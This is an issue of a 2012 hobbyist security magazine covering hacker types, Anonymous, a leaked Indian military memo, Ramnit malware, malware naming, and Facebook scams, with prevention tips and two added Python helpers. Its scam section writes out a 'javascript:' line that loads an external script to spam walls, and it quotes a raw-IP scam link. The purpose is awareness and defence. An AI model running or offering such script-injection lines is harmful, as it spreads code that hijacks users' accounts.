
Anonymous?! Intro about Anonymous hackers.

Indian Military Docs Stolen: Confidential memo leaked on web.

Who names the Malware? Info about computer malware.

Issue 01 Volume 01

Editorial
Belated happy new year to all my readers and friends. I thank all of you for downloading this magazine. ImHaker is here to raise awareness among people about computer security, hacking and hackers. The magazine will also be informative for security professionals and people who are learning. When you learn to break security, you are able to create better security. Nowadays most computer viruses spread through user interaction, for example malicious links with a catchy headline that attracts the user into falling into the hole. So people should be educated to protect themselves from this kind of problem. ImHaker features different categories you can enjoy, such as hacking, security, malware, and case studies. Hope you guys will enjoy this issue. ImHaker is a newborn baby; it needs your support to stand up.

- Gowtham

Content
Haker Events
Who is a hacker?
Hacked by Anonymous ?!
Indian Military Docs stolen!
Banking malware targets Facebook
What is a Malware?
Who names the malware?
Facebook scams and Viruses*
Geek Jokes
Tech View

[*Cover Story]

IMHAKER

January 2012

Haker Events (Jan-Feb 2012)

SyScan12 Singapore
When: Sunday, 15 Jan 2012
Where: Swissotel Merchant Court Hotel, Singapore
http://www.syscan.org/index.php/sg/cfp

SANS Security East 2012
When: January 17 - 26, 2012
Where: Sheraton New Orleans, New Orleans, LA
http://www.sans.org/security-east-2012/

ShmooCon 2012
When: Fri, Jan 27, 2012 - Mon, Jan 29, 2012
Where: Washington, DC USA
http://www.shmoocon.org/

NDSS Symposium 2012
When: Sun, Feb 5, 2012 - Thu, Feb 9, 2012
Where: San Diego, California USA
http://www.isoc.org/isoc/conferences/ndss/

13th Annual Privacy and Security Conference
When: 16 February - 17 February 2012
Where: Victoria Conference Centre, BC, Canada
http://www.rebootconference.com/privacy2012/

SANS 2012 North American SCADA Summit
When: January 21 - 29, 2012
Where: Lake Buena Vista, FL
http://www.sans.org/info/91501

CODASPY12 Second ACM Conference on Data and Application Security and Privacy
When: 08 Feb 2012 - 12 Feb 2012
Where: San Antonio, TX, United States
http://www.codaspy.org/

SANS Secure India 2012
When: 20 Feb 2012 - 25 Feb 2012
Where: Bangalore, India
http://www.sans.org/info/83954

SCALE 10x - 2012 Southern Linux Expo
When: January 20 - 22, 2012
Where: Hilton LAX - Los Angeles, CA USA
http://www.socallinuxexpo.org

SANS Monterey 2012
When: January 30 - February 4, 2012
Where: Monterey, CA
http://www.sans.org/info/91506

Cyber Crime Conference (CCC) 2012
When: Fri, Jan 20, 2012 - Sat, Jan 28, 2012
Where: Atlanta, Georgia USA
http://www.dodcybercrime.com/

InfoSec Southwest 2012
When: Wednesday, 1 Feb 2012
Where: Austin, Texas
http://www.infosecsouthwest.com/cfp.html

ESSoS 12 International Symposium on Engineering Secure Software and Systems
When: 16 Feb 2012 - 17 Feb 2012
Where: Eindhoven, Netherlands
http://goo.gl/EBPkh

Nullcon Goa 2012
When: February 15 - 18, 2012
Where: Goa, India
http://www.nullcon.net/site/conference.php

SANS Phoenix 2012
When: February 13 - 18, 2012
Where: Phoenix, AZ
http://www.sans.org/info/91511

RSA Conference 2012
When: Mon, Feb 27, 2012 - Sat, Mar 2, 2012
Where: San Francisco, California USA
http://www.rsaconference.com/

You Shot The Sherif 6 (YSTS 6)
When: Sunday, 26 Feb 2012
Where: Sao Paulo, Brazil
http://www.ysts.org/

BSidesVienna 2012
When: January 21, 2012
Where: TBA
http://goo.gl/8Fcjk

BugCON Security Conference 12
When: February 2 - 3, 2012
Where: Mexico City, Mexico
http://www.bugcon.org

FC12 Financial Cryptography and Data Security 2012
When: 27 Feb 2012 - 02 Mar 2012
Where: Bonaire, Netherlands Antilles
http://fc12.ifca.ai/


Who is a Hacker?
Hackers are heroes of the cyber world!

In general, hacking is the art of modifying things so that they are customized as you wish. In computer security, hacking is the process of finding vulnerabilities and using them to break into a system. Hackers are the ultimate skilled people, who have knowledge in all fields of computer and technology. The basic characteristics of hackers are: they are skilled in programming, reverse engineering, networking, hardware and more; they hack things for money, dispute or adventure; and they are able to think offensively as well as defensively.

If you want to be a web designer you need to think creatively and learn PHP, HTML, CSS and other web-oriented languages; for a software engineer you need to think logically and learn C++, Java, Perl, VB, C#, .NET and so on; and for a database administrator you need to know MySQL, SQL, Oracle and so on. But if you want to be a hacker you need to learn all these things and gain expertise in them.

Hackers can be categorized by their attitude as well as their skill level. A white hat hacker is a person who hacks things ethically. They get an agreement signed by the owners to hack things and submit a report on the system's security and vulnerabilities. White hat hackers are formally known as security professionals. On the other hand, malicious hackers crack things illegally, without the owner's permission, for some personal protest or profit. They are formally known as crackers. As a combination of black and white hat, we have grey hat hackers, who may surf the internet and hack into computer systems for the sole purpose of notifying the administrator that their system has been hacked, and then may offer to repair the system for a small fee.

Based on skill level, the elite hacker stands at the top as the most skilled person. Next to that, a script kiddie is a non-expert person who breaks into systems by using pre-packaged automated tools. A new person who is learning computer hacking is known as a newbie, n00b or neophyte. As a special case we have blue hat hackers, who work in software firms as penetration or application testers. Microsoft uses the term blue hat to represent a series of security briefings. A hacktivist is a person who breaks into systems to announce a social, ideological, religious or political message. Most hacktivism involves website defacement (changing the home page of a website to notify that the website has been hacked, or to show any other message) and DoS attacks.

Hacked by Anonymous ?!
A hacktivist group
Anonymous is a concept that spreads via the internet and originated in 2003. It represents the concept of many online community users simultaneously existing as a society without a publicly enforced government or violently enforced political authority: a digitalized global brain. In its early form, the concept was adopted by a decentralized online community acting anonymously in a coordinated manner, usually toward a loosely self-agreed goal, and primarily focused on entertainment. Beginning in 2008, the Anonymous collective has become increasingly associated with collaborative, international hacktivism, undertaking protests and other actions, often with the goal of promoting internet freedom and freedom of speech. Actions credited to Anonymous are undertaken by unidentified individuals who apply the Anonymous label to themselves as attribution.

Anonymous has defined itself as: "We [Anonymous] just happen to be a group of people on the internet who need just kind of an outlet to do as we wish, that we wouldn't be able to do in regular society. ...That's more or less the point of it. Do as you wish. ... There's a common phrase: 'we are doing it for the lulz.'"

Still, experts are not sure that the collective, whose members hide behind the mask of legendary British freedom fighter Guy Fawkes, which quickly became the symbol of this group. Definitions tend to emphasize the fact that the concept, and by extension the collective of users, cannot be readily encompassed by a simple definition. Instead it is often defined by aphorisms describing perceived qualities. One self-description is: "We are Anonymous. We are Legion. We do not forgive. We do not forget. Expect us."

In July 2011, the FBI arrested 16 people in the United States for the hacking attacks by the Anonymous group, and a sixteen-year-old who goes by the hacker handle Tflow, and is believed to be a key member of LulzSec, was arrested in London. AnonOps Communications, which is a news website about Anonymous, reports that Anonymous fights for The Pirate Bay, a famous BitTorrent website recently blocked by the Finnish government, and the SOPA (Stop-Online-Piracy-Act).

Hacktivism involving Anonymous

Year: Operations

2006-07: Habbo raids, Hal Turner raid, Chris Forcand arrest.

2008: Project Chanology, Epilepsy Foundation forum invasion, Defacement of SOHH and All HipHop websites.

2009: No Cussing Club, 2009 Iranian election protests, Operation Didgeridie.

2010: Operation Titstorm, Oregon Tea Party raid, Operations Payback, Avenge Assange, and Bradical, Operation Leakspin, Zimbabwe.

2011: Attack on Fine Gael website, Arab Spring Activities, Attack on HBGary Federal, Purported threat against the Westboro Baptist Church, 2011 Wisconsin protests, 2011 Bank of America document release, Operation Sony, Spanish Police, Supporting 2011 Indian Anti-corruption movement in cyber space, Operation Malaysia, Operation Orlando, Operation Intifada, Operation AntiSecurity, Operation Facebook, Operation BART, Support of Occupy Wall Street, Operation Syria, Operation DarkNet, Opposition to Los Zetas, Operation Brotherhood Takedown, Operation Blackout, Operation Mayhem, Attack on Lt. John Pike, Attack on Stratfor.

2012: Occupy Nigeria.

Indian Military Docs stolen!
Backdoor access in the secured network

An Indian hacker group named The Lords of Dharmaraja has broken into the Indian military network and stolen critical documents and signed agreements.

Backdoor access provided by Nokia, RIM and Apple ?!?

This is the same group that had leaked the source code of Norton Anti-virus. It was reported that Indian military intelligence officials have reportedly been given backdoor access for digital surveillance by Nokia, Apple and Research In Motion (RIM), which makes BlackBerry phones.

The memo revealed that the backdoor was allegedly used by Indian intelligence to spy on officials of the United States-China Economic and Security Review Commission (USCC). USCC officials on Monday told Reuters that the organization has contacted relevant authorities to investigate the matter. The news agency reported that the USCC did not dispute the authenticity of intercepted mails that were cited in the leaked memo.

Officials in India could not be reached for comment. According to the memo, which was prepared on October 6 last year, the backdoor was reportedly opened by Nokia, Apple and RIM in exchange for doing business in the Indian market.

"Since MI (military intelligence) has no access to USCC LAN (local area network) limited to VPN, POP servers (communication gateways) etc, and they are primary target concerning PRC (People's Republic of China), decision was made earlier this year to sign an agreement with mobile manufacturers in exchange for Indian market presence," the memo read.

Alan Hely, senior director of corporate communications at Apple, told TOI that the company would not like to comment on the leaked memo. "But I can deny that backdoor access was provided," he said. A Nokia spokesperson too refused to comment on the specifics of the matter but said, "The [...] the privacy of customers and their data seriously and is committed to comply with all applicable data protection and privacy laws."

RIM refused to comment on this specific case. However, the Canadian company that makes BlackBerry phones says in its guidelines that it has no ability to provide its customers' encryption keys to anyone and that it maintains a consistent global standard for lawful access requirements that does not include special deals for specific countries.

While electronic surveillance and wiretapping is often a necessity to check crime and for national security purposes, the law usually only allows for it on a case-to-case basis. It is not clear at the moment if the alleged backdoor access provided by Nokia, RIM and Apple was used for en masse surveillance in India. As more and more people connect to the digital world, governments across the world are looking to tap into the networks, often with the help of private companies, for information gathering and spying.

Banking Malware Targets Facebook

Zeus is a malware that was discovered in 2010 and used to steal banking/financial data. The source code of Zeus, which was leaked on the web last year, has been amended by hackers to steal Facebook information, according to researchers from Seculert, an enterprise-focused internet security company.

Ramnit, a modified version of Zeus

The malware variant Ramnit is known to be a modified version of Zeus. Win32/Ramnit is a family of multi-component malware that infects Windows executable files, Microsoft Office files and HTML files. Win32/Ramnit spreads to removable drives and steals sensitive information such as saved FTP credentials and browser cookies. The malware may also open a backdoor to await instructions from a remote attacker. The attackers behind Ramnit are using the stolen credentials to log in to victims' Facebook accounts and to transmit malicious links to their friends, thereby magnifying the malware's spread even further.

Ramnit was not initially designed to harvest Facebook credentials, but the Ramnit maintainers have recognized the value of Facebook accounts for propagation. Whereas email can be easily spoofed and is therefore more likely to be ignored, communication received from a trusted contact on Facebook will have much higher click-through rates. Victims are simply not aware that the trusted Facebook account from which the communication was received may itself have already been compromised.

Aliases:
Type_Win32 (Kaspersky)
Win32/Zbot.A (AVG)
W32/Infector.Gen2 (Avira)
Win32/Ramnit.A (CA)
Win32.Rmnet (Dr.Web)
W32.Infector (Ikarus)
W32/Ramnit.a (McAfee)
W32/Patched-I (Sophos)
PE_RAMNIT.A (Trend Micro)

Symptoms: The following system changes may indicate the presence of this malware: the presence of the file Srv.exe.

Ramnit recently stole over 45,000 Facebook login credentials, 96 percent of which were from the UK or France. Facebook hasn't been the only target for Ramnit; it was able to gain remote access to financial institutions, compromise online banking sessions and penetrate several corporate networks. Facebook clarified that over half of these logins were either invalid or had old/expired passwords. The company has initiated remedial steps for all affected users to ensure the security of their accounts and has "begun working with our external partners to add protections to our anti-virus systems to help users secure their devices".

Seculert said they provided Facebook with a complete list of compromised accounts. They noted that the tendency to recycle passwords could play a role in using the harvested Facebook credentials to access VPN services, email, and various other accounts online.

Chart published by Seculert.

Use the link below to see the Facebook Security Infography: http://goo.gl/suixg

What is a Malware?
Basics of Malicious Software
Malware is a software program whose intent is malicious or whose effects are malicious. The spectrum of malware covers a wide variety of specific threats, including viruses, worms, Trojan horses and spyware. There are several techniques to detect, detain and destroy malware. Have you ever thought about how big an impact malware really has? It is important to know, because if computer security is to be treated as risk management, then you have to accurately assess how much damage a lapse in security could cause.

The cost of malware can be computed in two ways. First, the real costs of malware are those which are apparent and which are relatively easy to calculate. If a software or hardware component of your computer is damaged by a virus, the cost to replace it is straightforward to assess. If your company's computer is affected by a virus, the cost and time spent by your technical team to repair it can be considered a real cost. The hidden costs are the costs whose impact can't be measured accurately, and may not even be known. For example, banks and financial companies could suffer damage to their reputation from a publicized malware incident. Regardless of the business, a leak of proprietary information or customer data caused by malware could result in enormous damage to a company, no different from industrial espionage. Any downtime could drive existing customers to a competitor or turn away new, potential customers.

The basic characteristics of malware are as follows. Self-replicating malware actively attempts to propagate by creating new copies or instances of itself. Malware may also propagate passively, by a user copying it accidentally.

Malware in the wild differs in characteristics, size and infection level.

Population growth describes the overall change in the number of malware instances due to self-replication. Malware that doesn't self-replicate will always have zero population growth, but malware with a zero population growth may self-replicate. Parasitic malware requires some other executable code in order to exist. "Executable" in this sense means anything that can be executed, such as boot code on a disk, binary code in applications and interpreted code. It also includes source code, like application scripting languages, and code that may require compilation before being executed.

Malware type    Self-replicating    Population growth    Parasitic
Logic Bomb      No                  Zero                 Possibly
Trojan Horse    No                  Zero                 Yes
Back Door       No                  Zero                 Possibly
Virus           Yes                 Positive             Yes
Worm            Yes                 Positive             No
Rabbit          Yes                 Zero                 No
Spyware         No                  Zero                 No
Adware          No                  Zero                 No

Table: malware types and their characteristics.

Who names the Malware?


Unfortunately, there isn't a central naming authority for malware.

When a new piece of malware is spreading, the top priority of anti-virus companies is to provide an effective defence, quickly. Coming up with a catchy name for the malware is a secondary concern. Typically the primary, human-readable name of a piece of malware is decided by the anti-virus researcher who first analyses the malware. Names are often based on unique characteristics that the malware has, either some feature of its code or some effect that it has. Unfortunately, there will not be a central naming authority in the near future, for two reasons. First, the current speed of malware spreading precludes checking with a central authority in a timely manner. Second, it isn't always clear what would need to be checked, since one distinct piece of malware may manifest itself in a practically infinite number of ways.

General form of malware names:
Bagle.C
E-Mail worm.win32.Bagle.c
W32.Bagle.C@MM
WIN32/Bagle.c@MM

Malware type: The type of malware, such as Trojan or Worm.
Platform specifier: The operating environment in which the malware runs. WIN32 represents a 32-bit Windows operating system. VBS represents a Visual Basic Script.
Family name: The human-readable name of the malware, usually chosen by the anti-virus researcher performing the analysis.
Variant: Malware tends to be released multiple times with minor changes. Each such change is referred to as a variant of the malware. Variants are commonly assigned letters in increasing order of discovery. Example: aaa.A -> aaa.B -> aaa.C and so on, as Z gives way to AA.
Modifiers: Modifiers supply additional information about the malware. For example, MM stands for Mass Mailing.
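The name parts described above, as an added example that is not part of the original magazine: a parser that reduces different vendors' names for the same sample to one family/variant key, plus the variant letter sequence. The names come from this page; treating W32 as another spelling of Win32, and carrying the letter sequence past AA (AZ -> BA), are assumptions of the example.

```python
import re
from dataclasses import dataclass
from typing import Optional, Tuple

# WIN32 and VBS are the platform specifiers named in the text; treating W32
# as another spelling of Win32 is an assumption of this example.
PLATFORMS = {"win32": "Win32", "w32": "Win32", "vbs": "VBS"}

# Names quoted on this page: the four Bagle forms and two Ramnit aliases.
PAGE_NAMES = ["Bagle.C", "E-Mail worm.win32.Bagle.c", "W32.Bagle.C@MM",
              "WIN32/Bagle.c@MM", "Win32/Ramnit.A", "W32/Ramnit.a"]


@dataclass(frozen=True)
class MalwareName:
    malware_type: Optional[str]
    platform: Optional[str]
    family: str
    variant: Optional[str]
    modifiers: Tuple[str, ...]


def parse_name(raw: str) -> MalwareName:
    """Split a detection name into type, platform, family, variant, modifiers."""
    body, *mods = raw.strip().split("@")
    tokens = [t.strip() for t in re.split(r"[./]", body) if t.strip()]
    # The platform token anchors the layout: type before it, family after it.
    idx = next((i for i, t in enumerate(tokens) if t.lower() in PLATFORMS), None)
    malware_type = platform = None
    if idx is not None:
        platform = PLATFORMS[tokens[idx].lower()]
        malware_type = " ".join(tokens[:idx]) or None
        tokens = tokens[idx + 1:]
    if not tokens or len(tokens) > 2:
        raise ValueError(f"unrecognised name layout: {raw!r}")
    variant = tokens[1].upper() if len(tokens) == 2 else None
    modifiers = tuple(m.upper() for m in mods if m)
    return MalwareName(malware_type, platform, tokens[0], variant, modifiers)


def variant_index(variant: str) -> int:
    """Discovery order as a number: A=1 ... Z=26, AA=27."""
    if not re.fullmatch(r"[A-Za-z]+", variant):
        raise ValueError(f"variant is not a letter sequence: {variant!r}")
    n = 0
    for ch in variant.upper():
        n = n * 26 + (ord(ch) - ord("A") + 1)
    return n


def next_variant(variant: str) -> str:
    """Letters assigned to the next variant: A -> B, Z -> AA."""
    n = variant_index(variant) + 1
    out = ""
    while n:
        n, rem = divmod(n - 1, 26)
        out = chr(ord("A") + rem) + out
    return out


def group_by_sample(names):
    """Group raw names that share a family and variant, ignoring letter case."""
    groups = {}
    for raw in names:
        parsed = parse_name(raw)
        key = (parsed.family.casefold(), parsed.variant)
        groups.setdefault(key, []).append(raw)
    return groups


if __name__ == "__main__":
    for key, raws in group_by_sample(PAGE_NAMES).items():
        print(key, "<-", raws)
    print("after Z comes", next_variant("Z"))
```

Aliases that carry no family name, or a different one, cannot be matched this way and still need a lookup table.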


Facebook Scams and Viruses

Facebook is regularly used by millions of people around the world; it has taken a place in some people's list of daily activities too. This makes Facebook a hot target for online scammers and black SEO marketers. Every day a lot of people are infected by various malware roaming around Facebook.

1. The Facebook wall post attack is used in link marketing, or some people do this to make fun of their friends. It is done with a JavaScript file that was uploaded to an external web server. It is really annoying if your Facebook wall is full of messages. Sometimes the wall is filled with replicated copies of the same message. Recently many SEO marketers have been spam posting on users' walls.

HOW DO THEY DO THAT?
First the attacker writes a JavaScript file containing malicious code that gets the number of posts and what to post on the wall from the user, who simply enters code like the following:

javascript:(a = (b = document).createElement("script")).src = "//********.com/*****.js", b.body.appendChild(a); void(0)

After this code is executed, your wall will be full of replicated spam posts.

HOW TO PREVENT?
These kinds of attacks are potentially unpredictable because they are done by a new/unidentified person who uses a fake profile for this purpose. Once you have experienced this kind of attack, report the post to Facebook as spam and immediately block the respective user from your Facebook settings. If the attack was done by one of your well-known friends, alert him/her to change their Facebook password, because their account may be compromised.

2. Second, the Facebook scam post viral attack. This attack uses social engineering techniques to target users, such as news of Osama bin Laden's death, actress scam videos, pornography/violence videos or any news that is trending at the time. An example of a pornography scam video attack looks like this: [VIDEO] DAD CATCHES DAUGHTERS ON WEBCAM [OMGGGG].AVI [LINK]

In December 2011 the Italian actress Marika Fruscio was a victim of an infamous wardrobe malfunction during a soccer show on Italian TV. The video of the incident went viral and is now being used as bait in this scam. There are also a number of Marika Fruscio fan pages on Facebook.

This scam is one of the many on Facebook that use the clickjacking technique to trick users into revealing confidential information and giving unauthorised access to their computers.

HOW DO THEY DO THAT?
Someone from your Facebook friends list will say "Wanna laugh?? Watch my video here http://94.xxx.4x.5x/100000?xxxxxxxx" (xxxx is random numbers, i.e. http://94.xxx.4x.5x/100000?134068738), or the message would be like this: "Hello How are you? your friend XYZ is in leading role in this video check it out http://94.113.44.57/100000?134068738". If the victim replies to this message, the victim will get some random messages in reply from the virus-infected friend's Facebook account. Obviously the victim (in this case, you) will click on the link, and the script associated with that video will automatically be liked by you and posted on all your friends' walls. These actions are done behind the scenes. Meanwhile a web page opens that looks the same as the video page of the very well-known and leading video broadcasting site YouTube, where the title of the video will be something like "[ONE OF YOUR FACEBOOK FRIENDS NAME] is in leading role in this video". But the victim will not be able to watch the video and will be prompted to download the Adobe Flash Player plugin. The victim downloads the Flash player from the link given on the same page, but that Flash player is NOT the original Flash Player plugin; it is actually a backdoor developed very smartly to get access to your computer.

HOW TO PREVENT?
While Facebook on its part is actively taking steps for a safer Facebook experience, the responsibility also lies with the user.
1. Be a sceptic. Doubt the authenticity of every link that you click.
2. As a rule, don't always trust short URLs.
3. Do not enter your Facebook credentials on any website whose URL doesn't begin with www.facebook.com.
4. It could be a foe hiding behind your friend, because your friend's account could have been compromised and is being used to spread malware.
5. Match the content and the character of the person. If your staid college professor is posting a link on hot babes, raise a red flag.
6. Some scams and spams try to trigger your curiosity. And curiosity killed the cat. So don't bother and just delete.
7. Anyone promising you easy money or anything of desire could actually be luring you into a trap. Stay away. No free iPads.
8. If any communication on Facebook asks you to copy and paste some code to the address bar of your browser, don't.
9. If clicking on a link that isn't meant to ask for a software installation asks you to download/install something, stop. It could be malware.
10. You can also enable Login Approvals from the Account Security section of your account's settings page. This will add an additional layer of security to your Facebook account.
11. Also, many of those fun apps can end up doing more harm than fun. Be selective about the apps you want to add.
12. It is also a good idea to like Facebook Security (http://www.facebook.com/security) so that you can keep a tab on all the security related updates on Facebook.
13. If you find any content that is spammy or scammy, report it as spam or scam.
14. If you are a Firefox user, use security add-ons such as WOT and NoScript to prevent malicious links being clicked.
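Several of the prevention tips above (short URLs, code for the address bar, where to enter credentials) can be checked mechanically. The following is an added example, not part of the original magazine: it parses the host out of a link instead of comparing the start of the string, which is what tip 3 needs in practice. The sample links, the shortener hosts other than goo.gl, and the finding labels are constructed for this example.

```python
import ipaddress
from urllib.parse import urlsplit

TRUSTED_LOGIN_HOSTS = {"www.facebook.com"}  # tip 3
# goo.gl is the shortener used on this page; the other hosts are assumptions.
SHORTENER_HOSTS = {"goo.gl", "bit.ly", "tinyurl.com", "t.co"}

# Constructed sample links; 203.0.113.7 is a documentation-only address
# standing in for the raw-IP video link described in the text.
SAMPLE_LINKS = [
    "javascript:void(0)",
    "http://203.0.113.7/100000?134068738",
    "http://goo.gl/xxxxx",
    "http://www.facebook.com.login.example/",
    "https://www.facebook.com/security",
]


def _split(url):
    """Parse a link, adding a scheme if missing; None if it cannot be parsed."""
    text = url.strip()
    if "://" not in text:
        text = "http://" + text
    try:
        parts = urlsplit(text)
        parts.hostname  # may raise ValueError on malformed hosts
        return parts
    except ValueError:
        return None


def _host(parts):
    return (parts.hostname or "").rstrip(".").lower()


def _is_ip(host):
    try:
        ipaddress.ip_address(host)
        return True
    except ValueError:
        return False


def is_trusted_login_url(url):
    """Tip 3: the host itself, not the start of the string, must match."""
    parts = _split(url)
    return parts is not None and _host(parts) in TRUSTED_LOGIN_HOSTS


def triage_link(url):
    """Return the list of warning labels that apply to one link."""
    if url.strip().lower().startswith("javascript:"):
        return ["javascript-uri"]          # tip 8: code for the address bar
    parts = _split(url)
    if parts is None or not _host(parts):
        return ["unparseable"]
    host, findings = _host(parts), []
    if _is_ip(host):
        findings.append("raw-ip-host")     # like the video link in the text
    if host in SHORTENER_HOSTS:
        findings.append("short-url")       # tip 2
    if parts.username is not None:
        findings.append("userinfo-in-url")  # text before '@' is not the host
    is_facebook = host == "facebook.com" or host.endswith(".facebook.com")
    if "facebook" in host and not is_facebook:
        findings.append("facebook-lookalike-host")
    return findings


if __name__ == "__main__":
    for link in SAMPLE_LINKS:
        print(link, "->", triage_link(link) or "no findings")
```

An empty result only means none of these checks fired; the other tips still apply.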


Geek Jokes!
Social games in Facebook become annoying to most of the users!

Where is the ANYKEY?

Tech View

Huawei Ascend P1 S vs Fujitsu F-07 D: world's thinnest smartphone runs on Android

At the world's greatest tech show, Consumer Electronics Show (CES) 2012, two smartphones duked it out for the title of the world's thinnest smartphone. Huawei Ascend P1 S - Thinness: 6.68mm (Picture 1) & Fujitsu F-07 D - Thinness: 6.7mm (Picture 2).

Watch these two phones in action on video: goo.gl/eyLGx and goo.gl/0q7sk

Victorinox Swiss Army unveils pocket-sized terabyte storage device at the 2012 International Consumer Electronics Show

Some key features and benefits of the Victorinox SSD include:
World's smallest high-capacity SSD drive on the market to date.
Variety of storage capacities: 64GB, 128GB, 256GB, and 1 terabyte.
World's only SSD device with only one connector that fits into USB 2/3 and eSATA 2/3 connectors.
World's only SSD device with a Bi-Stable graphic display (E-Paper software) for labeling contents.
Handles automatic backup and synchronization issues in un-hacked AES 256 security (combination hardware and software).
Each SSD comes equipped with two knife bodies, between which the drive can easily be interchanged: one is flight-friendly and the other includes traditional Swiss Army Knife implements (blade, scissors, nail file/screw driver combo).

WE NEED YOU TO HELP US!

ImHaker is taking its first step in the cyber world. We want you to suggest any new topics to be included and any changes you want us to make in the magazine. In order to satisfy your needs, we need your help through any form of feedback. We are planning to increase the number of pages in the magazine, so you can expect more hacking and fun in our next issue, which is going to be published on February 01, 2012.

Visit us at: http://www.imhaker.com
Mail us at: feedback@imhaker.com

Disclaimer

All the information shared in this magazine is strictly for educational purposes and to improve the security defence attitude to prevent hacker attacks. Do not abuse any information provided by ImHaker magazine. If you cause any damage to your own or anyone else's property, directly or indirectly, with the information provided, ImHaker Magazine and the authors are not responsible for that. Hacking is a crime if it is carried out illegally. Secure yourself and help others.